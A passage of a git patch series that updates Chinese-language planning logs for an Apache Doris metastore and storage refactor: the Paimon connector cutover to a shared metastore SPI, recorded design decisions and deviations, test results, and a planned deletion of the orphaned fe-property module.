= **P2-T04**(pom + gate 核对,⚠️ 必核 plugin-zip 含 metastore-spi 的 `META-INF/services` 否则运行时 ServiceLoader 发现不到 5 provider),然后 **P2-T05** docker 真闸(HMS/DLF live + plugin-zip ServiceLoader + T1/T2 等价 + D-014 收敛行为)。 - **FU-T02 ✅ + FU-T03 ✅ 完成(2026-06-18,D-011 授权)**:P1-T06 前的两项 fe-filesystem 对象存储补齐均完成(**R-008 + R-006 闭环**)。 - **FU-T02(R-008,commit `e5b088b14e7`)**:`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties.getAwsCredentialsProviderTypeForBackend()`——ak/sk 皆空→`AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略。**DV-005**:不加字段/枚举(legacy OSS/COS/OBS 本无可配置 provider type,且 `S3CredentialsProviderType` 在 s3 模块、oss/cos/obs 不依赖)。TDD RED(`expected but was `)→GREEN;OSS 13/0·COS 12/0·OBS 12/0 + 全模块绿、checkstyle 0。 - **FU-T03(R-006,本次 commit)**:4 个 `*FileSystemPropertiesTest` 各加 1 个调优默认守护测试(BE map + Hadoop map,字面量期望值非常量);S3 50/3000/1000、OSS/COS/OBS 100/10000/10000(已核 legacy parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→ 4 测全红证有效。S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + sibling 绿、checkstyle 0。纯 test-only。 @@ -40,6 +41,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-18 **P2-T03 ✅(paimon adapter cutover 到共享 metastore-spi,commit `3c1e118dcfa`)**:直接读真实代码全路 + 对抗 recon `wf_9437dd4e-06d`(6 reader+synth+verify=SOUND/READY,逐键 parity 通过)→ 2 边界经 AskUserQuestion 定:**D-014**(采用 spi legacy-faithful validate——CREATE CATALOG 比当前 paimon 更严:HMS forbidIf(simple)/requireIf(kerberos)、REST case-sensitive `"dlf".equals`、DLF 在 CREATE 要求 OSS;故意向 legacy 收敛)、**D-015**(JDBC 注册副作用留连接器,仅纯 `resolveDriverUrl` 共享,Rule 2 不投机)。**改 5 main+2 test+pom**(白名单内,净 +318/−847):`validateProperties`→`MetaStoreProviders.bind(props,{}).validate()`;`createCatalog` HMS/DLF→`bind`+新薄 `PaimonCatalogFactory.assembleHiveConf(base,overrides)`(HMS seed `loadHiveConfResources` base 再叠 `toHiveConfOverrides`,DLF `assembleHiveConf(null,toDlfCatalogConf())`)、删 build-time `requireOssStorageForDlf`;两处 driver-url→`JdbcDriverSupport.resolveDriverUrl`;`PaimonCatalogFactory` 删 6 法+`KNOWN_FLAVORS`+加 `assembleHiveConf`;`PaimonConnectorProperties` 删 `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*`(**DV-008**:别名数组只**部分**删,`HMS_URI`/`REST_URI`/`JDBC_*` 仍被 `buildCatalogOptions` 用故保留;`bind` 取代设计早期 `*MetastoreBackend.parse`;`assembleHiveConf` 为离线测 F2 而抽)。**TDD**:新 `PaimonConnectorValidatePropertiesTest` 13/0(3 tightening RED→GREEN 实证)+ 删 28 旧 builder/validate 测(content parity 已由 spi `Hms/DlfMetaStorePropertiesTest` 13+7 覆盖)+ 2 `assembleHiveConf` 测。**验证 paimon 全模块 278/0/1skip**、checkstyle 0、import-gate exit 0、白名单干净。**对抗 review `wf_dd78ec4b-da5`**(4 lens+verify=READY,0 真 finding;唯一 MAJOR「kerberos.principal alias 未测」证伪=该键走 verbatim passthrough→测它恒真 tautology 违 Rule 9,隔离 binding 的 `service.principal`→`kerberos.principal` 方向已被 spi line72/80 覆盖)。⚠️ **docker e2e 未跑**(HMS/DLF live metastore=hive + plugin-zip ServiceLoader 发现 5 provider 在子优先 loader=P2-T04/T05 真闸)。**下一步 P2-T04**。 - 2026-06-18 **P2-T02 ✅(新建 fe-connector-metastore-spi,commit `7ea63528bc4`)**:recon workflow `wf_187e052d-230`(4 reader+synth,证两 deviation)+ 直接核实 → 3 边界经 AskUserQuestion 定(**DV-006** fe-kerberos compile-dep-only 零新代码、**DV-007** storage 中立 Map 模块 hadoop/fs-free、全 5 后端一次 commit)。建 22 文件:`MetaStoreProvider` SPI + `MetaStoreProviders` first-hit ServiceLoader 派发 + `MetaStoreParseUtils` + `JdbcDriverSupport.resolveDriverUrl`(纯 resolver;注册留 P2-T03)+ `AbstractMetaStoreProperties` + 5 `*Impl`(`@ConnectorProperty`,消灭手抄别名)+ 5 provider(`sensitivePropertyKeys` 暴露 sensitive 键)+ 单 services 文件。来源=上移 paimon `PaimonCatalogFactory` 手抄逻辑去 fe-core 化(HiveConf→中立 Map、authenticator→`KerberosAuthSpec` facts)。**HMS D-4 补回** forbidIf-simple/requireIf-kerberos(CASE-SENSITIVE `Objects.equals` 对齐 ParamRules,保留与 conf-build `equalsIgnoreCase` 的不对称)。验证 spi **41/0**、checkstyle 0、import-gate 0、**3 mutation 证**(RED→GREEN)。**对抗 review `wf_2ddae04d-cf9`(4 lens+verify)**:0 BLOCKER;1 真 MAJOR=**REST token-provider `equalsIgnoreCase`→`"dlf".equals`**(paimon 手抄 latent bug,legacy ParamRules 权威)已修;FS `supports()` 去 trim 不对称 + 对齐 legacy;DV-006/007/D-006/D-4 独立核实正确;trim/accessPublic-proxyMode 经核证对齐权威 legacy contract(不改);补 12 测覆盖缺口。**API 旁改 2 javadoc**(诚实订正,白名单内)。**下一步 P2-T03**(必接 hive.conf.resources base + kerberos() doAs 契约 + driver 注册下移)。⚠️ docker 未跑(T2 真闸 P2-T05)。 - 2026-06-18 **进入 P2(metastore SPI):P3a-T01 facts-carrier ✅ + P2-T01 ✅**(D-012 跳过/推迟 P1-T06 docker;D-013 用户选 fe-kerberos 先建)。**P3a-T01 facts 切片**(commit `51df4fccd01`)新建顶层叶子 `fe-kerberos`(零依赖)= `AuthType`(SIMPLE/KERBEROS, fromString 仅 "kerberos" 命中) + `KerberosAuthSpec`(principal/keytab 不可变值对象, hasCredentials 需两者);6 测绿、checkstyle 0。**P2-T01**(本次 commit)新建 `fe-connector-metastore-api`:`MetaStoreProperties`(providerName + needsStorage/needsVendedCredentials 默认 false + validate no-op + raw/matched,**无 MetaStoreType 枚举** D-006)+ HMS/DLF/REST/JDBC/FileSystem 5 子接口(中立 Map/标量;HMS 经 fe-kerberos `AuthType`/`Optional`);依赖仅 fe-kerberos(D-013;fe-foundation/fe-filesystem-api 留 spi 用时再加);契约测试 3/0、checkstyle 0、import-gate exit 0、无 fe-core 禁包 import。未建 Glue/S3Tables(留扩展)。⚠️ docker 全程未跑(留 P2-T05)。**下一步 P2-T02**。 - 2026-06-18 **FU-T02 ✅ + FU-T03 ✅**(D-011,P1-T06 前补齐 fe-filesystem 对象存储;R-008 + R-006 闭环):**FU-T02**(commit `e5b088b14e7`)`Oss/Cos/ObsFileSystemProperties.toBackendKv()` 内联镜像 legacy `AbstractS3CompatibleProperties` 基类条件(ak/sk 皆空发 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`、否则省略);**DV-005** 不加字段/枚举(legacy OSS/COS/OBS 无可配置 provider type、`S3CredentialsProviderType` 在 s3 模块不可达,加字段反更不贴 legacy + 须扩白名单)——比原 D-011「加字段镜像 S3」更简更贴 legacy(用户本轮指令「处理逻辑一致」)。TDD RED→GREEN(3 ANONYMOUS 测 + 3 有凭据 assertNull 守省略)。**FU-T03** 4 个 `*PropertiesTest` 加调优默认守护(BE+Hadoop map,字面量期望值;S3 50/3000/1000、OSS/COS/OBS 100/10000/10000,已核 legacy `S3Properties.Env`/`OSS|COS|OBSProperties` parity);mutation 改 4 个 `DEFAULT_MAX_CONNECTIONS`→4 测全红证守护。验证:S3 15/0·OSS 14/0·COS 13/0·OBS 13/0 + 全 sibling suite 绿、checkstyle 0×4、`git diff` 白名单干净。⚠️ docker e2e 未跑(真闸 P1-T06)。**下一步 P1-T06**(R-006/7/8 全闭环 → 干净全绿验收)。 diff --git a/plan-doc/metastore-storage-refactor/decisions-log.md b/plan-doc/metastore-storage-refactor/decisions-log.md index c974f7bcc22183..67c066b6300664 100644 --- a/plan-doc/metastore-storage-refactor/decisions-log.md +++ b/plan-doc/metastore-storage-refactor/decisions-log.md @@ -5,6 +5,20 @@ --- +## D-015 — P2-T03 JDBC driver 注册副作用留连接器,仅纯 `resolveDriverUrl` 共享(不下移注册) +- **日期**:2026-06-18 | **决策者**:用户(AskUserQuestion 选「方案 A:注册留连接器(推荐)」) +- **背景**:P2-T02 只上移了纯 `JdbcDriverSupport.resolveDriverUrl`(其 javadoc 明记 live 注册「无调用方、P2-T03 前不搬,Rule 2」)。HANDOFF 把「driver 注册下移与否」列为 P2-T03 决策点。driver 逻辑两消费方:①`PaimonConnector`(FE 侧)真执行注册(`DriverManager.registerDriver`+`DriverShim`+静态 `DRIVER_CLASS_LOADER_CACHE`/`REGISTERED_DRIVER_KEYS`);②`PaimonScanPlanProvider.getBackendPaimonOptions`(BE 选项)只解析 URL 不注册。唯一共享=`resolveDriverUrl`。 +- **内容**:**注册副作用留 `PaimonConnector` 不动**;P2-T03 仅把两处 `PaimonCatalogFactory.resolveDriverUrl`(删)改调 `JdbcDriverSupport.resolveDriverUrl`(字节相同)。 +- **理由**:单消费方(FE 注册)→ 下移是为 hive/iceberg 将来服务的投机(Rule 2);metastore-spi 刻意 SDK/JVM-副作用-free(DV-007 保持 hadoop/fs-free),注入 `DriverManager` 全局变更+活 `URLClassLoader`+`Class.forName` 模糊 api/spi 纯净边界;`DriverShim` 的 loader 身份对 DriverManager 接受是 load-bearing 的,子优先插件 loader 下迁移它有 classloader 风险而零功能收益(CI RCA 记忆 RC-1/3/5 反复证 classloader 危害)。**被否**:方案 B(下移注册)。 +- **影响**:`JdbcDriverSupport` javadoc「注册留待 P2-T03」状态=**已决定不下移**(待 hive/iceberg 真第二消费方时再议);无新模块改动。 + +## D-014 — P2-T03 采用 spi 的 legacy-faithful validate(CREATE CATALOG 比当前 paimon 更严,故意收敛) +- **日期**:2026-06-18 | **决策者**:用户(AskUserQuestion 选「采用 spi validate(legacy-faithful)」) +- **背景**:P2-T02 的 spi `validate()` 故意比 paimon 手抄 `PaimonCatalogFactory.validate` 严,恢复了真 legacy 规则(手抄版漏掉的):HMS **case-sensitive** `forbidIf(simple)`/`requireIf(kerberos)`(client principal+keytab)、REST **case-sensitive** `"dlf".equals(token.provider)`(手抄是 equalsIgnoreCase)、DLF 在 **CREATE** 要求 OSS 存储(手抄在 catalog-build 时 `requireOssStorageForDlf`)。P2-T02 只建 spi、无消费方;P2-T03 cutover 是这些规则首次作用于真实 CREATE CATALOG。 +- **内容**:cutover **直接采用** `MetaStoreProviders.bind(props,{}).validate()`,接受 CREATE CATALOG 比当前 paimon 更严(今天通过 paimon 宽松检查的某些 catalog 现在会在 CREATE 被拒)。这是项目 T2「等价=对齐 legacy 非对齐手抄」目标的兑现。 +- **理由**:spi 的更严规则才是权威 legacy(`HMSBaseProperties.buildRules`/`AliyunDLFBaseProperties`/`ParamRules`);保留手抄宽松行为需 compat shim(更多代码、偏离目标、spi validate 部分闲置)。**被否**:方案 B(compat shim 保 CREATE 字节兼容)。 +- **影响**:行为变更 = 三处更严校验在 CREATE CATALOG 生效;unknown-flavor 错误文案从「Unknown paimon.catalog.type value: X」→ bind 的「No MetaStoreProvider supports...」(两者皆 IAE→DdlException,CREATE 仍失败);DLF S3-only 拒绝时机 build→CREATE(无 reload 回归:无效 catalog 在新模型下根本无法 CREATE 故不会持久化/reload)。测试:`PaimonConnectorValidatePropertiesTest` 钉新行为(3 tightening RED→GREEN)。 + ## D-013 — Kerberos 中立 facts 类型(AuthType + KerberosAuthSpec)落 fe-kerberos,先于 P2-T01 建;metastore-api 依赖 fe-kerberos - **日期**:2026-06-18 | **决策者**:用户(AskUserQuestion 选「In fe-kerberos (build it first)」) - **背景**:P2-T01 的 `HmsMetaStoreProperties` 需要 `AuthType`(SIMPLE/KERBEROS) + `KerberosAuthSpec`(principal/keytab facts)。`AuthType` 现仅在 `fe-common`(连接器 import gate 禁);设计把 `KerberosAuthSpec` 归 `fe-kerberos`(P3a-T01,原排在 P2-T02 之后)→ P2-T01 引用它有构建顺序冲突。 diff --git a/plan-doc/metastore-storage-refactor/deviations-log.md b/plan-doc/metastore-storage-refactor/deviations-log.md index e50cbe01de7458..08881a0bb88794 100644 --- a/plan-doc/metastore-storage-refactor/deviations-log.md +++ b/plan-doc/metastore-storage-refactor/deviations-log.md @@ -6,6 +6,15 @@ --- +## DV-008 — P2-T03 cutover 三处对设计/任务字面的细化(别名数组只能部分删、`*MetastoreBackend.parse`→`MetaStoreProviders.bind`、新增 `assembleHiveConf` 助手) +- **日期**:2026-06-18 | **原计划位置**:tasks `P2-T03`(「删 `PaimonConnectorProperties` 别名数组」「调共享 `*MetastoreBackend.parse`」)/ 设计 §3.3(adapter 内联 `new HiveConf()+base+overrides.forEach`)。 +- **为何偏差(对照真实代码 + recon `wf_9437dd4e-06d` verify 确认)**: + 1. **别名数组只能部分删**:任务 header 写「删别名数组」,但 `HMS_URI`/`REST_URI`/`JDBC_URI`/`JDBC_USER`/`JDBC_PASSWORD`/`JDBC_DRIVER_URL`/`JDBC_DRIVER_CLASS`/`CLIENT_POOL_*`/`LOCATION_*` 仍被**保留的** `buildCatalogOptions`/`append*Options`(paimon SDK Options 组装,非元存储连接)+ `PaimonScanPlanProvider`/`PaimonConnector` 的 JDBC 注册消费。**只有** `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*`(仅被删掉的 validate/buildDlfHiveConf 用)可删。 + 2. **`*MetastoreBackend.parse` 已被 P2-T02 的 provider 模式取代**:设计 §3.2 早期写 `Hms/DlfMetastoreBackend.parse(...)`,但 D-006 改为 `MetaStoreProvider.supports()`+`MetaStoreProviders.bind`;P2-T03 调 `bind` 非 `parse`(无中心 switch)。 + 3. **新增薄 `PaimonCatalogFactory.assembleHiveConf(base, overrides)`**:设计 §3.3 把 `new HiveConf()`+base+`overrides.forEach` 内联在 `createCatalog`。为离线可测 F2「base→overrides 覆盖」顺序(`createCatalog` 连真 metastore 无法离线测),抽成纯静态助手(Maps in, HiveConf out),HMS/DLF 两分支共用。非连接逻辑(纯组装),留连接器侧。 +- **新方案**:删 `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*` only;`MetaStoreProviders.bind` 派发;`assembleHiveConf` 助手承载 F2 layering(+2 UT)。**关键不变量保持**:HiveConf 内容 parity(content 由 spi `toHiveConfOverrides`/`toDlfCatalogConf` 产,spi 13+7 测钉)、F2 base-before-overrides(assembleHiveConf + `PaimonHmsConfResWiringTest` seam 测)。 +- **影响范围**:`PaimonCatalogFactory` 保留 `buildCatalogOptions`/`append*Options`/`buildHadoopConfiguration`/`applyStorageConfig`/`resolveFlavor`/`firstNonBlank`(+新 `assembleHiveConf`);`PaimonConnectorProperties` 保留非-DLF/REST-DLF 常量;设计 §3.3 待加(DV-008 修订)脚注「adapter 用 assembleHiveConf 助手、Options 组装留连接器」。不影响 T2 parity。 + ## DV-007 — P2-T02 共享 parser 的 storage 入参用中立 `Map storageHadoopConfig`,**不**用 `List`;spi 不依赖 fe-filesystem-api - **日期**:2026-06-18 | **原计划位置**:设计 §3.2(`*MetastoreBackend.parse(Map raw, List storage)`)/ tasks `P2-T02` header(「依赖 metastore-api + fe-foundation + **fe-filesystem-api**」)/ WORKFLOW §4.2(「新模块 metastore-api/spi 只可依赖 fe-foundation + fe-filesystem-api」)。 - **为何偏差(recon + 用户定夺 AskUserQuestion)**:recon(report A §6 / report D §4)证:①paimon 现有 up-move 源(`buildHmsHiveConf`/`buildDlfHiveConf`)已经吃**预算好的中立 `Map storageHadoopConfig`**(由 `PaimonConnector.buildStorageHadoopConfig` 从 `ctx.getStorageProperties().toHadoopProperties().toHadoopConfigurationMap()` 合并),**不**在 parser 内迭代 `StorageProperties`;②metastore-api 契约只在 javadoc 提 `StorageProperties`、签名零引用 → spi 用中立 Map 即可保持 **hadoop/fs-free**(零 fe-filesystem-api 依赖,最小化模块依赖面 + 无 classloader 面)。**关键不变量保持**:storage 叠加保序 + kerberos-在-storage-之后 由 **parser 拥有**(parser 收 storageHadoopConfig,在 `toHiveConfOverrides()`/`toDlfCatalogConf()` 内部按序 overlay)。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 77461004f42ca1..d7f776ed621845 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -97,9 +97,13 @@ - **验收**:T2 等价性测试通过(解析产物 == 旧 `Paimon*MetaStoreProperties`:HiveConf key 集 + ParamRules 报错文案);`@ConnectorProperty` 别名/sensitive 生效;`MetaStoreProviders.bind` 经 `supports()` 正确选中 5 后端(**无 per-backend 枚举/中心 switch**)。⚠️ docker 真闸留 P2-T05。 - **依赖**:P2-T01。设计 §4 P2-2 / §3.2 / §5 T2 / **D-006 / DV-006 / DV-007**。 -### P2-T03 ⬜ paimon adapter 改造 -- **做什么**:`PaimonCatalogFactory` 的 `buildHmsHiveConf`/`buildDlfHiveConf`/`validate`/别名常量 → 调共享 `*MetastoreBackend.parse` + 薄 paimon Options/HiveConf 组装;删 `PaimonConnectorProperties` 别名数组。 -- **验收**:paimon 5 flavor UT 全绿;adapter 不再含手抄连接逻辑(代码评审 + 行数显著下降)。 +### P2-T03 ✅ paimon adapter 改造(2026-06-18 完成,commit `3c1e118dcfa`) +- **完成态(2026-06-18,commit `3c1e118dcfa`)**:paimon 元存储连接逻辑 cutover 到共享 spi。**改 5 main + 2 test + pom**(白名单内):`PaimonConnectorProvider.validateProperties`→`MetaStoreProviders.bind(props,{}).validate()`(**D-014** 采用更严 legacy-faithful validate);`PaimonConnector.createCatalog` HMS/DLF 分支→`bind`+新 `PaimonCatalogFactory.assembleHiveConf(base,overrides)`(HMS 先 seed `ctx.loadHiveConfResources` base 再叠 `toHiveConfOverrides`;DLF `assembleHiveConf(null, toDlfCatalogConf())`)、删 build-time `requireOssStorageForDlf`;`resolveFullDriverUrl`+`PaimonScanPlanProvider:1054`→`JdbcDriverSupport.resolveDriverUrl`(**D-015** 注册副作用留连接器);`PaimonCatalogFactory` 删 `validate`/`buildHmsHiveConf`/`buildDlfHiveConf`/`requireOssStorageForDlf`/`resolveDriverUrl`/`copyIfPresent`/`nullToEmpty`/`KNOWN_FLAVORS`+加薄 `assembleHiveConf`;`PaimonConnectorProperties` 删 `DLF_*`/`REST_TOKEN_PROVIDER`/`REST_DLF_*`(**DV-008**:别名数组只部分删,`HMS_URI`/`REST_URI`/`JDBC_*` 仍被 `buildCatalogOptions` 用,保留)。**行数**:净 +318/−847。**TDD**:新 `PaimonConnectorValidatePropertiesTest` 13/0(3 tightening RED→GREEN 实证 + 10 retarget);`PaimonCatalogFactoryTest` 删 28 旧测(buildHmsHiveConf/buildDlfHiveConf/requireOssStorageForDlf/validate,content parity 已由 spi `Hms/DlfMetaStorePropertiesTest` 13+7 覆盖)+ 加 2 `assembleHiveConf` 测。**验证**:paimon 全模块 **278/0/1skip**(skip=`PaimonLiveConnectivityTest` gated)、checkstyle 0、`tools/check-connector-imports.sh` exit 0、白名单干净。**recon `wf_9437dd4e-06d`**(6 reader+synth+verify)verify=**SOUND AND READY offline**(逐键 parity 通过、无假 gap/无遗漏 blocker)。**对抗 review `wf_dd78ec4b-da5`**(4 lens+verify)verify=**READY,0 真 finding**(1 MAJOR「kerberos.principal alias 未测」经核证伪=该键也走 verbatim `hive.*` passthrough→测它是恒真 tautology 违 Rule 9;真正隔离 binding 的 `service.principal`→输出 `kerberos.principal` 方向已被 spi 测 line72/80 覆盖)。⚠️ **docker e2e 未跑**(HMS/DLF live metastore=hive + 插件 zip ServiceLoader 发现 5 provider 在子优先 loader 下=P2-T05 真闸)。 +- **认领 recon(保留)**:直接读真实代码全路 + 对抗 recon workflow `wf_9437dd4e-06d`;2 边界经 AskUserQuestion 定(D-014 validate 收敛、D-015 注册留连接器)。 +- **做什么**:`PaimonCatalogFactory` 的 `buildHmsHiveConf`/`buildDlfHiveConf`/`validate`/`requireOssStorageForDlf`/`resolveDriverUrl` → 调共享 `MetaStoreProviders.bind(raw, storageHadoopConfig)` + 薄 paimon HiveConf 组装(新 `assembleHiveConf(base, overrides)` 纯助手);驱动 URL 解析两处调用点改 `JdbcDriverSupport.resolveDriverUrl`;删 `PaimonConnectorProperties` 的 DLF_*/REST_TOKEN_PROVIDER/REST_DLF_* 别名常量。**保留**(paimon SDK / 存储,非元存储连接):`buildCatalogOptions`+`append*Options`、`buildHadoopConfiguration`+`applyStorageConfig`、`resolveFlavor`、`firstNonBlank`、JDBC 注册副作用(`maybeRegisterJdbcDriver`/`DriverShim`/静态缓存留 PaimonConnector,Q2=方案A)。 +- **认领 recon**:直接读真实代码(PaimonCatalogFactory/PaimonConnector/PaimonConnectorProvider/PaimonConnectorProperties/PaimonScanPlanProvider:1054 全部 + 5 spi impl + MetaStoreProviders + api 6 接口 + 调用方/校验接线 + 测试面)+ 对抗 recon workflow `wf_9437dd4e-06d`(6 reader+synth+verify,verify 判 **SOUND AND READY offline**:无假 gap、无遗漏 blocker、HMS/DLF/applyStorageConfig/resolveDriverUrl 逐键 parity 通过)。2 边界经 AskUserQuestion 定:**Q1=采用 spi 的 legacy-faithful validate**(更严:HMS forbidIf-simple/requireIf-kerberos + REST case-sensitive `"dlf".equals`;CREATE CATALOG 比当前 paimon 更严,故意向 legacy 收敛);**Q2=注册留连接器**(只换纯 `resolveDriverUrl`,JVM 副作用不入纯 spi,Rule 2 无第二消费方)。 +- **TDD**:新测打 `PaimonConnectorProvider.validateProperties`(含 HMS requireIf/forbidIf 新规、DLF-需 OSS、unknown→IAE 无"bogus"文案断言)+ `PaimonCatalogFactory.assembleHiveConf` 顺序测(base→overrides 覆盖);删 PaimonCatalogFactoryTest 的 buildHmsHiveConf/buildDlfHiveConf/requireOssStorageForDlf/validate 直测(内容 parity 已由 spi 41/0 覆盖);保 PaimonHmsConfResWiringTest(seam 仍绿)。 +- **验收**:paimon 全模块 UT 全绿;adapter 不再含手抄连接逻辑(行数显著降);`tools/check-connector-imports.sh` 不破。⚠️ docker 真闸留 P2-T05(HMS/DLF live metastore=hive + 插件 zip ServiceLoader 发现 5 provider 未离线验)。 - **依赖**:P2-T02。设计 §4 P2-3 / §3.3。 ### P2-T04 ⬜ paimon pom + gate 核对 From 5c6b3071162aa65fbadaf0fcfc0ba895da18a885 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 19:03:15 +0800 Subject: [PATCH 096/128] docs(storage-refactor): set next phase = P1-T07 delete fe-property (D-016) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit User authorized physically deleting the now-orphaned fe-property module (0 consumers since P1-T05 broke the paimon edge) and set it as the next phase, ahead of P2-T04/T05. - decisions-log: D-016 authorizes the deletion, supersedes D-005's "do not delete fe-property" clause (fe-core datasource.property.{storage,metastore} still off-limits), expands the whitelist. - WORKFLOW §4.1: move fe/fe-property/** from forbidden to allowed-for-deletion; allow removing fe-property's +dependencyManagement from fe/pom.xml. - tasks.md: add P1-T07 (delete dir + fe/pom.xml declarations + optional stale-comment scrub; RED/GREEN = build gate). Whole-repo recon recorded: only fe/pom.xml is a real reference; 0 org.apache.doris.property imports; no BE/docker/script/regression refs. - HANDOFF/PROGRESS: next step -> P1-T07, then P2-T04 (with the MetaStoreProviders 2-arg ServiceLoader robustness note) -> P2-T05 docker. Docs only; no code deleted this turn (P1-T07 executes next session). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../metastore-storage-refactor/HANDOFF.md | 29 ++++++++++++------- .../metastore-storage-refactor/PROGRESS.md | 6 ++-- .../metastore-storage-refactor/WORKFLOW.md | 6 ++-- .../decisions-log.md | 8 +++++ plan-doc/metastore-storage-refactor/tasks.md | 9 +++++- 5 files changed, 42 insertions(+), 16 deletions(-) diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 6cb3ec916aed1e..32fdca243e13a0 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,7 +7,7 @@ --- -**更新时间**:2026-06-18(实现 session:**P2-T03 ✅ paimon adapter cutover 到共享 metastore-spi**[commit `3c1e118dcfa`];下一步 = **P2-T04**[paimon pom + gate 核对],然后 **P2-T05** docker 真闸) +**更新时间**:2026-06-18(实现 session:**P2-T03 ✅ paimon adapter cutover 到共享 metastore-spi**[commit `3c1e118dcfa`];**用户改下一阶段 = P1-T07 彻底删除 fe-property 孤儿模块**[D-016 授权],然后 P2-T04 → P2-T05 docker 真闸) **更新人**:Claude(Opus 4.8) > **本 session P2 进度补注(最新在最前)**: @@ -56,20 +56,27 @@ ## 当前状态 -- 阶段:Research ✅ / Design ✅(**15 决策 D-001..D-015**)/ **Implement 🚧(P1 storage 5/6 P1-T06 docker 推迟[D-012];P2: 3/5 = P2-T01 + P2-T02 + P2-T03 ✅;P3a facts-carrier ✅)**。 -- 任务计数 **11/14**(P0: 2/2 ✅ | P1: 5/6,**P1-T06 推迟** | **P2: 3/5(P2-T01 + P2-T02 + P2-T03 ✅)** | P3a: 0/1,facts-carrier 切片 ✅ 机制待续[DV-006 推迟到 P3b])| follow-up FU-T01/02/03 ✅| P3b 占位。 -- **新增 3 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)+ `fe-connector-metastore-spi`(5 解析器 + Provider SPI,22 文件)。**paimon 连接器已 cutover 到共享 spi**(P2-T03:连接逻辑走 `MetaStoreProviders.bind`,手抄 `build*HiveConf`/`validate`/`resolveDriverUrl`/别名数组已删)。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 +- 阶段:Research ✅ / Design ✅(**16 决策 D-001..D-016**)/ **Implement 🚧(P1 storage 5/6 P1-T06 docker 推迟[D-012];P2: 3/5 = P2-T01 + P2-T02 + P2-T03 ✅;P3a facts-carrier ✅)**。 +- 任务计数 **11/15**(P0: 2/2 ✅ | P1: 5/7,**P1-T06 推迟** + **P1-T07 新增=下一步** | **P2: 3/5** | P3a: 0/1,facts 切片 ✅ 机制待续[DV-006→P3b])| follow-up FU-T01/02/03 ✅| P3b 占位。 +- **新增 3 模块**:顶层叶子 `fe-kerberos`(facts 切片)+ `fe-connector-metastore-api`(5 子接口)+ `fe-connector-metastore-spi`(5 解析器 + Provider SPI,22 文件)。**paimon 连接器已 cutover 到共享 spi**(P2-T03)。**fe-property 已 0 消费者孤儿**(P1-T05 断边),**用户授权下一步彻底删除**(D-016)。**R-006/R-007/R-008 已闭环**(UT/mutation 层)。 - ⚠️ **e2e/docker 全程未跑**(P1 storage 等价 T1 + P2 metastore T2/5-flavor 闸 一并留 P2-T05 docker 跑;D-012)。 -## 下一步(明确):P2-T04(paimon pom + gate 核对),然后 P2-T05(docker 真闸) -> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 TDD + 一句话复述。** +## 下一步(明确):**P1-T07 彻底删除 fe-property 模块**(用户 2026-06-18 定为下一阶段,D-016),然后 P2-T04 → P2-T05 +> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手;实施前 WORKFLOW §2 单任务 + 一句话复述。** -**P2-T04(paimon pom + gate 核对)**: -- **做什么**:核 `fe-connector-paimon/pom.xml` 依赖集 = `fe-connector-{api,spi}` + **`fe-connector-metastore-spi`(P2-T03 已加,transitively 带 metastore-api + fe-kerberos)** + `fe-filesystem-api` + `fe-thrift(provided)` + paimon SDK + hadoop/aws/…;`grep` 确认 paimon 无 fe-core import(`org.apache.doris.{catalog,common,datasource,qe,analysis,nereids,planner}`);`tools/check-connector-imports.sh` PASS(P2-T03 已验 exit 0,复核即可)。 -- **⚠️ P2-T03 recon 揪出、P2-T04/T05 必核(packaging)**:**插件 zip 必须含 metastore-spi 的 `META-INF/services/org.apache.doris.connector.metastore.spi.MetaStoreProvider`(5 行)**,否则运行时 `MetaStoreProviders.load()` 经 ServiceLoader 在**子优先插件 loader** 下发现不到 5 provider → `bind` 抛「No MetaStoreProvider supports」→ 所有 paimon CREATE/读 挂。UT(单 flat loader)已证 services 可发现(278/0),但 **plugin-zip 子优先 loader 是 docker-gated**。核 paimon 的 assembly/copy-plugin-deps 是否把 metastore-spi(含 services 文件 + 其 transitive metastore-api/fe-kerberos)打进 zip。 -- **依赖**:P2-T03 ✅。设计 §4 P2-4。 +**P1-T07(彻底删除 fe-property 孤儿模块)— 下一步**: +- **背景**:P1-T05 断开 paimon→fe-property 依赖边后,fe-property = **0 消费者孤儿**。D-016 用户授权物理删除(**覆盖 D-005「不删 fe-property」条款**;fe-core `datasource.property.{storage,metastore}` 两包**仍禁碰**,仍服务 hive/hudi/iceberg)。WORKFLOW §4.1 白名单已把 `fe/fe-property/**` 移入允许删除区。 +- **做什么**:① 删 `fe/fe-property/` 整目录(26 java,pkg `org.apache.doris.property`);② 删 `fe/pom.xml` 的 `fe-property`(约 :222)+ dependencyManagement 里 fe-property 条目(约 :831);③ **可选** 清 5 处 stale 注释(删后悬空):`fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`/`HdfsConfigFileLoader` + paimon 的 `PaimonCatalogFactory`/`PaimonConnector`/`PaimonCatalogFactoryTest`(均提到「移植源/replaces fe-property」,白名单内)。 +- **现场 recon(2026-06-18 已做,执行 session 须复核 + 再跑一遍 whole-repo grep)**:`grep -rln fe-property`(排除 .git/fe-property/plan-doc/target)= 仅 `fe/pom.xml`(真)+ 上述 5 文件(注释);`grep 